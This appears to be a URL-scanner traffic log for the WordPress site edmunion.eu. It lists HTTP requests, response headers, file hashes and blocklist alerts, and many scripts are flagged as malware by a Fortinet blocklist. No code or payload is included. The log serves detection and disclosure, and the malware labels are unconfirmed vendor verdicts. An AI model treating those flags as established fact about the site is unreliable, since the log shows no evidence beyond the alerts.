Referer: http://www.edmunion.eu/

                                         77.240.112.203
HTTP/1.1 200 OK
Content-Type: text/css
                                        
Server: nginx
Date: Fri, 04 Nov 2022 20:42:21 GMT
Content-Length: 121205
Last-Modified: Sun, 04 Mar 2018 13:13:01 GMT
Connection: keep-alive
ETag: "5a9bf0dd-1d975"
X-Powered-By: PleskLin
Accept-Ranges: bytes


--- Additional Info ---
Magic:  ASCII text, with very long lines (65367), with CRLF line terminators
Size:   121205
Md5:    5057f321f0dc85cd8da94a0c5f67a8f4
Sha1:   224c9f9ad11b495358aa61dbd53e838e9b61015b
Sha256: 5a3d8c05785485d36ee5c94d4681e5b1d9e4b94c5be8b5bd7b0f3168fff1bd9a
                                        
                                            GET /wp-includes/js/jquery/jquery-migrate.min.js?ver=3.3.2 HTTP/1.1 
Host: www.edmunion.eu
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://www.edmunion.eu/

                                         77.240.112.203
HTTP/1.1 200 OK
Content-Type: application/javascript
                                        
Server: nginx
Date: Fri, 04 Nov 2022 20:42:22 GMT
Content-Length: 11224
Last-Modified: Wed, 09 Dec 2020 01:46:07 GMT
Connection: keep-alive
ETag: "5fd02c5f-2bd8"
X-Powered-By: PleskLin
Accept-Ranges: bytes


--- Additional Info ---
Magic:  ASCII text, with very long lines (11126)
Size:   11224
Md5:    79b4956b7ec478ec10244b5e2d33ac7d
Sha1:   a46025b9d05e3df30d610a8aef14f392c7058dc9
Sha256: 029e0a2e809fd6b5dbe76abe8b7a74936be306c9a8c27c814c4d44aa54623300
                                        
                                            GET /wp-content/plugins/bold-page-builder/css/front_end/content_elements.crush.css?ver=6.1 HTTP/1.1 
Host: www.edmunion.eu
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: text/css,*/*;q=0.1
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://www.edmunion.eu/

                                         77.240.112.203
HTTP/1.1 200 OK
Content-Type: text/css
                                        
Server: nginx
Date: Fri, 04 Nov 2022 20:42:21 GMT
Content-Length: 169715
Last-Modified: Sat, 15 Dec 2018 00:14:20 GMT
Connection: keep-alive
ETag: "5c14475c-296f3"
X-Powered-By: PleskLin
Accept-Ranges: bytes


--- Additional Info ---
Magic:  ASCII text, with very long lines (375)
Size:   169715
Md5:    01b9ed8361ac110e6380291ff10c49bb
Sha1:   4714494963a3f570e8b3aa421dc1fdcacda61686
Sha256: ac1649da8b6b8af80052e155bc6c541f856ebc5518dd821917cb9d2af185fbeb

Alerts:
  Blocklists:
    - fortinet: Malware
                                        
                                            GET /wp-content/plugins/bold-page-builder/content_elements_misc/js/jquery.magnific-popup.min.js?ver=6.1 HTTP/1.1 
Host: www.edmunion.eu
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://www.edmunion.eu/

                                         77.240.112.203
HTTP/1.1 200 OK
Content-Type: application/javascript
                                        
Server: nginx
Date: Fri, 04 Nov 2022 20:42:22 GMT
Content-Length: 20216
Last-Modified: Sat, 15 Dec 2018 00:14:21 GMT
Connection: keep-alive
ETag: "5c14475d-4ef8"
X-Powered-By: PleskLin
Accept-Ranges: bytes


--- Additional Info ---
Magic:  ASCII text, with very long lines (20087)
Size:   20216
Md5:    ba6cf724c8bb1cf5b084e79ff230626e
Sha1:   f455c5f153f872e52265f87a644ff89fe14a6fb6
Sha256: 3fddc6d28aba3c13d64cfd4847c333ff48c71d4a5a58bd1a0494ca6ae8ac1bb4

Alerts:
  Blocklists:
    - fortinet: Malware
                                        
                                            GET /wp-content/plugins/bold-page-builder/content_elements_misc/js/content_elements.js?ver=1 HTTP/1.1 
Host: www.edmunion.eu
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://www.edmunion.eu/

                                         77.240.112.203
HTTP/1.1 200 OK
Content-Type: application/javascript
                                        
Server: nginx
Date: Fri, 04 Nov 2022 20:42:22 GMT
Content-Length: 11449
Last-Modified: Sat, 15 Dec 2018 00:14:21 GMT
Connection: keep-alive
ETag: "5c14475d-2cb9"
X-Powered-By: PleskLin
Accept-Ranges: bytes


--- Additional Info ---
Magic:  ASCII text, with CRLF line terminators
Size:   11449
Md5:    48cbee507f3dae11bf77ee121773de1f
Sha1:   d98267a8425d20f7b4c26c0cb4ad12923331c7f7
Sha256: 950c96741e3d568a9fdfef3d404c191b866f9886343e80157f231a76c38c0f6e

Alerts:
  Blocklists:
    - fortinet: Malware
                                        
                                            GET /wp-content/plugins/bold-page-builder/slick/slick.min.js?ver=6.1 HTTP/1.1 
Host: www.edmunion.eu
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://www.edmunion.eu/

                                         77.240.112.203
HTTP/1.1 200 OK
Content-Type: application/javascript
                                        
Server: nginx
Date: Fri, 04 Nov 2022 20:42:22 GMT
Content-Length: 41953
Last-Modified: Sat, 15 Dec 2018 00:14:20 GMT
Connection: keep-alive
ETag: "5c14475c-a3e1"
X-Powered-By: PleskLin
Accept-Ranges: bytes


--- Additional Info ---
Magic:  ASCII text, with very long lines (32076)
Size:   41953
Md5:    b53bdfc29e18f4d493d775a8023fbdc8
Sha1:   e9fcbcc4fa70cba093b81d982a1b78509414cef7
Sha256: e02af7df9a190d88380e2dcec2050ecaa493ae2d23526dbeec67f6907df3a752
                                        
                                            GET /wp-content/plugins/bold-page-builder/script_fe.js?ver=1 HTTP/1.1 
Host: www.edmunion.eu
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://www.edmunion.eu/

                                         77.240.112.203
HTTP/1.1 200 OK
Content-Type: application/javascript
                                        
Server: nginx
Date: Fri, 04 Nov 2022 20:42:22 GMT
Content-Length: 1515
Last-Modified: Sat, 15 Dec 2018 00:14:20 GMT
Connection: keep-alive
ETag: "5c14475c-5eb"
X-Powered-By: PleskLin
Accept-Ranges: bytes


--- Additional Info ---
Magic:  ASCII text, with CRLF line terminators
Size:   1515
Md5:    64e162bfa1349e3af675c362d13a434d
Sha1:   cf8f729189bf60aa78a4343156af15b17ca95376
Sha256: e9a06715f6f1880744b7f342c069c20b7e1f4748353661fe258a90e36cf6b03e
                                        
                                            GET /wp-content/themes/denorious/js/bootstrap.min.js?ver=1.0.0 HTTP/1.1 
Host: www.edmunion.eu
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://www.edmunion.eu/

                                         77.240.112.203
HTTP/1.1 200 OK
Content-Type: application/javascript
                                        
Server: nginx
Date: Fri, 04 Nov 2022 20:42:22 GMT
Content-Length: 37051
Last-Modified: Sun, 04 Mar 2018 13:13:01 GMT
Connection: keep-alive
ETag: "5a9bf0dd-90bb"
X-Powered-By: PleskLin
Accept-Ranges: bytes


--- Additional Info ---
Magic:  ASCII text, with very long lines (32033), with CRLF line terminators
Size:   37051
Md5:    04c84852e9937b142ac73c285b895b85
Sha1:   8fb8a9319055253d085edfc3bb72d20f614ec709
Sha256: 36460e494e4c628443afded40b2743b5ede9a4a76fb4f7b9ef2345cc7e59fd64

Alerts:
  Blocklists:
    - fortinet: Malware
                                        
                                            GET / HTTP/1.1 
Host: push.services.mozilla.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Sec-WebSocket-Version: 13
Origin: wss://push.services.mozilla.com/
Sec-WebSocket-Protocol: push-notification
Sec-WebSocket-Extensions: permessage-deflate
Sec-WebSocket-Key: 9c5Goaj+fCkDzgxDlVkXSg==
Connection: keep-alive, Upgrade
Sec-Fetch-Dest: websocket
Sec-Fetch-Mode: websocket
Sec-Fetch-Site: cross-site
Pragma: no-cache
Cache-Control: no-cache
Upgrade: websocket

                                         52.42.234.253
HTTP/1.1 101 Switching Protocols
                                        
Connection: Upgrade
Upgrade: websocket
Sec-WebSocket-Accept: eiztnprtsCl08kwIb6Vti1HJq/k=

                                        
                                            GET /wp-content/themes/denorious/js/jquery.circliful.min.js?ver=1.0.0 HTTP/1.1 
Host: www.edmunion.eu
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://www.edmunion.eu/

                                         77.240.112.203
HTTP/1.1 200 OK
Content-Type: application/javascript
                                        
Server: nginx
Date: Fri, 04 Nov 2022 20:42:22 GMT
Content-Length: 7473
Last-Modified: Sun, 04 Mar 2018 13:13:01 GMT
Connection: keep-alive
ETag: "5a9bf0dd-1d31"
X-Powered-By: PleskLin
Accept-Ranges: bytes


--- Additional Info ---
Magic:  ASCII text, with very long lines (7473), with no line terminators
Size:   7473
Md5:    0015194159d744b4e38956ac30824a42
Sha1:   eac31a82b15ac4208b9c78c95c13e77f4583faae
Sha256: 74da2b4001c15b8f46a26988c47632845d06706e46388fc3d08b99ec3797d63f

Alerts:
  Blocklists:
    - fortinet: Malware
                                        
                                            GET /wp-content/themes/denorious/js/isotope.pkgd.js?ver=1.0.0 HTTP/1.1 
Host: www.edmunion.eu
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://www.edmunion.eu/

                                         77.240.112.203
HTTP/1.1 200 OK
Content-Type: application/javascript
                                        
Server: nginx
Date: Fri, 04 Nov 2022 20:42:22 GMT
Content-Length: 35631
Last-Modified: Sun, 04 Mar 2018 13:13:01 GMT
Connection: keep-alive
ETag: "5a9bf0dd-8b2f"
X-Powered-By: PleskLin
Accept-Ranges: bytes


--- Additional Info ---
Magic:  ASCII text, with very long lines (32003), with CRLF line terminators
Size:   35631
Md5:    d5e00cf73d518ca8d72c253c51e6014a
Sha1:   409130ec6321c17ebf6743f6ae0816e5ddda7235
Sha256: 7fe76fc5d85d4e5b0b7d32c7c9ff88a3f6556342efa6d29d701344ffc76afadd
                                        
                                            GET /wp-content/themes/denorious/js/jquery.downCount.js?ver=1.0.0 HTTP/1.1 
Host: www.edmunion.eu
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://www.edmunion.eu/

                                         77.240.112.203
HTTP/1.1 200 OK
Content-Type: application/javascript
                                        
Server: nginx
Date: Fri, 04 Nov 2022 20:42:22 GMT
Content-Length: 3912
Last-Modified: Sun, 04 Mar 2018 13:13:01 GMT
Connection: keep-alive
ETag: "5a9bf0dd-f48"
X-Powered-By: PleskLin
Accept-Ranges: bytes


--- Additional Info ---
Magic:  ASCII text, with CRLF line terminators
Size:   3912
Md5:    a9d6fbb86150e591450bffc00f4495ec
Sha1:   a96d906cce8c4f5ab70cf3db5b406ae45749a0ab
Sha256: 03346673b82670f1cb0a3b4752ec028eb4f824789a23ea09f0052ed019bd27f2

Alerts:
  Blocklists:
    - fortinet: Malware
                                        
                                            GET /wp-includes/js/jquery/jquery.min.js?ver=3.6.1 HTTP/1.1 
Host: www.edmunion.eu
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://www.edmunion.eu/

                                         77.240.112.203
HTTP/1.1 200 OK
Content-Type: application/javascript
                                        
Server: nginx
Date: Fri, 04 Nov 2022 20:42:22 GMT
Content-Length: 89684
Last-Modified: Wed, 02 Nov 2022 01:45:15 GMT
Connection: keep-alive
ETag: "6361cbab-15e54"
X-Powered-By: PleskLin
Accept-Ranges: bytes


--- Additional Info ---
Magic:  ASCII text, with very long lines (65447)
Size:   89684
Md5:    17738318d61d394f1de8890d589afaec
Sha1:   f6d0c4dc1399cf02d53f5753ad46573a8bbc2ac3
Sha256: cc7403bab52ed166e24ea9324241045af370be482f5b594468f4a6ac6e7e7981

Alerts:
  Blocklists:
    - fortinet: Malware
                                        
                                            GET /wp-content/themes/denorious/js/lity/lity.min.js?ver=1.0.0 HTTP/1.1 
Host: www.edmunion.eu
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://www.edmunion.eu/

                                         77.240.112.203
HTTP/1.1 200 OK
Content-Type: application/javascript
                                        
Server: nginx
Date: Fri, 04 Nov 2022 20:42:22 GMT
Content-Length: 6300
Last-Modified: Sun, 04 Mar 2018 13:13:01 GMT
Connection: keep-alive
ETag: "5a9bf0dd-189c"
X-Powered-By: PleskLin
Accept-Ranges: bytes


--- Additional Info ---
Magic:  ASCII text, with very long lines (6182), with CRLF line terminators
Size:   6300
Md5:    94b383e7c707143030616886285cfb9d
Sha1:   0e83bc0de47df518e8ba555cb1ac25679d87a58a
Sha256: 6648f671f84f72381200422772ca242a920e4a73aa82bbb16427f431ed697a57

Alerts:
  Blocklists:
    - fortinet: Malware
                                        
                                            GET /wp-content/themes/denorious/js/jflickrfeed.min.js?ver=1.0.0 HTTP/1.1 
Host: www.edmunion.eu
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://www.edmunion.eu/

                                         77.240.112.203
HTTP/1.1 200 OK
Content-Type: application/javascript
                                        
Server: nginx
Date: Fri, 04 Nov 2022 20:42:22 GMT
Content-Length: 1731
Last-Modified: Sun, 04 Mar 2018 13:13:01 GMT
Connection: keep-alive
ETag: "5a9bf0dd-6c3"
X-Powered-By: PleskLin
Accept-Ranges: bytes


--- Additional Info ---
Magic:  ASCII text, with very long lines (425), with CRLF line terminators
Size:   1731
Md5:    edddf66884fe1a84ed2bfadf5de6b61c
Sha1:   cd8b2cdc1137045fd67fdd1cf3cad81e2752b717
Sha256: 7331e568d44900f570f233a6cc0022a6a8f272f6fdabcae6ddc2092fe1c00c1a
                                        
                                            GET /wp-content/themes/denorious/js/denorious-main.js?ver=1.0.0 HTTP/1.1 
Host: www.edmunion.eu
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://www.edmunion.eu/

                                         77.240.112.203
HTTP/1.1 200 OK
Content-Type: application/javascript
                                        
Server: nginx
Date: Fri, 04 Nov 2022 20:42:22 GMT
Content-Length: 24287
Last-Modified: Sun, 04 Mar 2018 13:13:01 GMT
Connection: keep-alive
ETag: "5a9bf0dd-5edf"
X-Powered-By: PleskLin
Accept-Ranges: bytes


--- Additional Info ---
Magic:  ASCII text, with very long lines (361), with CRLF line terminators
Size:   24287
Md5:    46764122abcc49de21642b9ce7c9a2bc
Sha1:   de1598419d1fb144127a6cd515361e8f2a862879
Sha256: 7446f8cb6fa7fe4057c203d756f674a770a44fdcb35ae10cb3339dccdb5abe0b

Alerts:
  Blocklists:
    - fortinet: Malware
                                        
                                            GET /wp-includes/js/comment-reply.min.js?ver=6.1 HTTP/1.1 
Host: www.edmunion.eu
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://www.edmunion.eu/

                                         77.240.112.203
HTTP/1.1 200 OK
Content-Type: application/javascript
                                        
Server: nginx
Date: Fri, 04 Nov 2022 20:42:22 GMT
Content-Length: 2981
Last-Modified: Wed, 25 May 2022 00:45:28 GMT
Connection: keep-alive
ETag: "628d7c28-ba5"
X-Powered-By: PleskLin
Accept-Ranges: bytes


--- Additional Info ---
Magic:  ASCII text, with very long lines (2946)
Size:   2981
Md5:    492f2c1a7ea7eb83fe42e0ff7cb51aa2
Sha1:   db36a77f6aaa2063bfbec02c2c0e967438c5a245
Sha256: e174a58a503ab84b3d1b9de12fd3895788204485170f1289e445f7b5b98ec789

Alerts:
  Blocklists:
    - fortinet: Malware
                                        
                                            GET /wp-content/themes/denorious/js/scrolltotop/totop.js?ver=1.0.0 HTTP/1.1 
Host: www.edmunion.eu
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://www.edmunion.eu/

                                         77.240.112.203
HTTP/1.1 200 OK
Content-Type: application/javascript
                                        
Server: nginx
Date: Fri, 04 Nov 2022 20:42:22 GMT
Content-Length: 350
Connection: keep-alive
X-Accel-Version: 0.01
Last-Modified: Sun, 04 Mar 2018 13:13:01 GMT
ETag: "15e-56695f8083140"
Accept-Ranges: bytes
X-Powered-By: PleskLin


--- Additional Info ---
Magic:  ASCII text, with CRLF line terminators
Size:   350
Md5:    fef49f0a44ef1fc44ab88f0886477c3d
Sha1:   06f0634ca101345a00d031eb030d9e9a0388a510
Sha256: 4beea5ce78bf433084986f1f0e276befbaf2369a177916fce61e11a582af0716

Alerts:
  Blocklists:
    - fortinet: Malware
                                        
                                            GET /wp-content/uploads/2018/03/cropped-logo-1.png HTTP/1.1 
Host: www.edmunion.eu
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://www.edmunion.eu/

                                         77.240.112.203
HTTP/1.1 200 OK
Content-Type: image/png
                                        
Server: nginx
Date: Fri, 04 Nov 2022 20:42:22 GMT
Content-Length: 4976
Last-Modified: Sun, 04 Mar 2018 13:16:07 GMT
Connection: keep-alive
ETag: "5a9bf197-1370"
X-Powered-By: PleskLin
Accept-Ranges: bytes


--- Additional Info ---
Magic:  PNG image data, 110 x 35, 8-bit/color RGBA, non-interlaced\012- data
Size:   4976
Md5:    5fdfa151fcbd7ed32131ebf1287f60fc
Sha1:   db840bf8bc9b2747d2e0df31ed481365f01b6c07
Sha256: 729aff3358b158a6d81654923d6e010e5f88c104bdd81763ce74f636896b2657
                                        
                                            POST /gts1c3 HTTP/1.1 
Host: ocsp.pki.goog
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 83
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

                                         142.250.74.35
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Date: Fri, 04 Nov 2022 20:42:22 GMT
Cache-Control: public, max-age=14400
Server: ocsp_responder
Content-Length: 471
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN

                                        
                                            POST /gts1c3 HTTP/1.1 
Host: ocsp.pki.goog
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 83
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

                                         142.250.74.35
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Date: Fri, 04 Nov 2022 20:42:22 GMT
Cache-Control: public, max-age=14400
Server: ocsp_responder
Content-Length: 471
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN

                                        
                                            GET /wp-content/themes/denorious/images/header.jpg HTTP/1.1 
Host: www.edmunion.eu
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://www.edmunion.eu/

                                         77.240.112.203
HTTP/1.1 200 OK
Content-Type: image/jpeg
                                        
Server: nginx
Date: Fri, 04 Nov 2022 20:42:22 GMT
Content-Length: 30041
Last-Modified: Sun, 04 Mar 2018 13:13:01 GMT
Connection: keep-alive
ETag: "5a9bf0dd-7559"
X-Powered-By: PleskLin
Accept-Ranges: bytes


--- Additional Info ---
Magic:  JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 1600x222, components 3\012- data
Size:   30041
Md5:    625775bf96b47aa5d45407db753c9b6f
Sha1:   007af18195eb5571dfd7291c15306444979bd659
Sha256: 0f611266e12d9b6a92bbbbe0060b02cf00b74078973618c4ace72bbcf95c16fc
                                        
                                            POST /gts1c3 HTTP/1.1 
Host: ocsp.pki.goog
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 83
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

                                         142.250.74.35
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Date: Fri, 04 Nov 2022 20:42:22 GMT
Cache-Control: public, max-age=14400
Server: ocsp_responder
Content-Length: 471
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN

                                        
                                            POST / HTTP/1.1 
Host: r3.o.lencr.org
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 85
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

                                         23.36.77.32
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Server: nginx
Content-Length: 503
ETag: "83FE5B11088985D78E51CB2E1457525F91C9BBF9C42ECA17D19A6CFFF734147A"
Last-Modified: Fri, 04 Nov 2022 03:00:00 UTC
Cache-Control: public, no-transform, must-revalidate, max-age=21600
Expires: Sat, 05 Nov 2022 02:42:22 GMT
Date: Fri, 04 Nov 2022 20:42:22 GMT
Connection: keep-alive

                                        
                                            GET /s/montserrat/v25/JTUSjIg1_i6t8kCHKm459Wlhyw.woff2 HTTP/1.1 
Host: fonts.gstatic.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: application/font-woff2;q=1.0,application/font-woff;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: identity
Origin: http://www.edmunion.eu
Connection: keep-alive
Referer: https://fonts.googleapis.com/
Sec-Fetch-Dest: font
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site

                                         216.58.207.195
HTTP/2 200 OK
content-type: font/woff2
                                        
accept-ranges: bytes
access-control-allow-origin: *
content-security-policy-report-only: require-trusted-types-for 'script'; report-uri https://csp.withgoogle.com/csp/apps-themes
cross-origin-resource-policy: cross-origin
cross-origin-opener-policy: same-origin; report-to="apps-themes"
report-to: {"group":"apps-themes","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/apps-themes"}]}
timing-allow-origin: *
content-length: 30928
x-content-type-options: nosniff
server: sffe
x-xss-protection: 0
date: Thu, 03 Nov 2022 16:40:18 GMT
expires: Fri, 03 Nov 2023 16:40:18 GMT
cache-control: public, max-age=31536000
age: 100924
last-modified: Mon, 11 Jul 2022 18:57:39 GMT
alt-svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  Web Open Font Format (Version 2), TrueType, length 30928, version 1.0\012- data
Size:   30928
Md5:    ac0d2859ea5f8fd6bcb3c305c08ec184
Sha1:   7f6c17e3e592cd8bd346b9cc261d8dd961b8aef7
Sha256: ae919a7c9f25f0fd97fc18e398ae8e453fcaae487e4a4cb4f896e7fecde4a780
                                        
                                            POST /gts1c3 HTTP/1.1 
Host: ocsp.pki.goog
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 83
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

                                         142.250.74.35
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Date: Fri, 04 Nov 2022 20:42:22 GMT
Cache-Control: public, max-age=14400
Server: ocsp_responder
Content-Length: 471
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN

                                        
                                            GET /s/arimo/v27/P5sMzZCDf9_T_10ZxCE.woff2 HTTP/1.1 
Host: fonts.gstatic.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: application/font-woff2;q=1.0,application/font-woff;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: identity
Origin: http://www.edmunion.eu
Connection: keep-alive
Referer: https://fonts.googleapis.com/
Sec-Fetch-Dest: font
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site

                                         216.58.207.195
HTTP/2 200 OK
content-type: font/woff2
                                        
accept-ranges: bytes
access-control-allow-origin: *
content-security-policy-report-only: require-trusted-types-for 'script'; report-uri https://csp.withgoogle.com/csp/apps-themes
cross-origin-resource-policy: cross-origin
cross-origin-opener-policy: same-origin; report-to="apps-themes"
report-to: {"group":"apps-themes","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/apps-themes"}]}
timing-allow-origin: *
content-length: 18260
x-content-type-options: nosniff
server: sffe
x-xss-protection: 0
date: Thu, 03 Nov 2022 17:03:31 GMT
expires: Fri, 03 Nov 2023 17:03:31 GMT
cache-control: public, max-age=31536000
age: 99531
last-modified: Mon, 11 Jul 2022 21:03:24 GMT
alt-svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  Web Open Font Format (Version 2), TrueType, length 18260, version 1.0\012- data
Size:   18260
Md5:    6dea752293556883fdae057d588b0bb1
Sha1:   e4d090e03bb920f5ddf7b09937428b2a0a2a9ee0
Sha256: 1ff84f1e03eb15dedc4668f0817372b734934076bc936e12c5c0bd3944dab0c0
                                        
                                            GET /s/poppins/v20/pxiEyp8kv8JHgFVrJJfecg.woff2 HTTP/1.1 
Host: fonts.gstatic.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: application/font-woff2;q=1.0,application/font-woff;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: identity
Origin: http://www.edmunion.eu
Connection: keep-alive
Referer: https://fonts.googleapis.com/
Sec-Fetch-Dest: font
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site

                                         216.58.207.195
HTTP/2 200 OK
content-type: font/woff2
                                        
accept-ranges: bytes
access-control-allow-origin: *
content-security-policy-report-only: require-trusted-types-for 'script'; report-uri https://csp.withgoogle.com/csp/apps-themes
cross-origin-resource-policy: cross-origin
cross-origin-opener-policy: same-origin; report-to="apps-themes"
report-to: {"group":"apps-themes","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/apps-themes"}]}
timing-allow-origin: *
content-length: 7884
x-content-type-options: nosniff
server: sffe
x-xss-protection: 0
date: Wed, 02 Nov 2022 21:48:50 GMT
expires: Thu, 02 Nov 2023 21:48:50 GMT
cache-control: public, max-age=31536000
age: 168812
last-modified: Wed, 27 Apr 2022 17:03:52 GMT
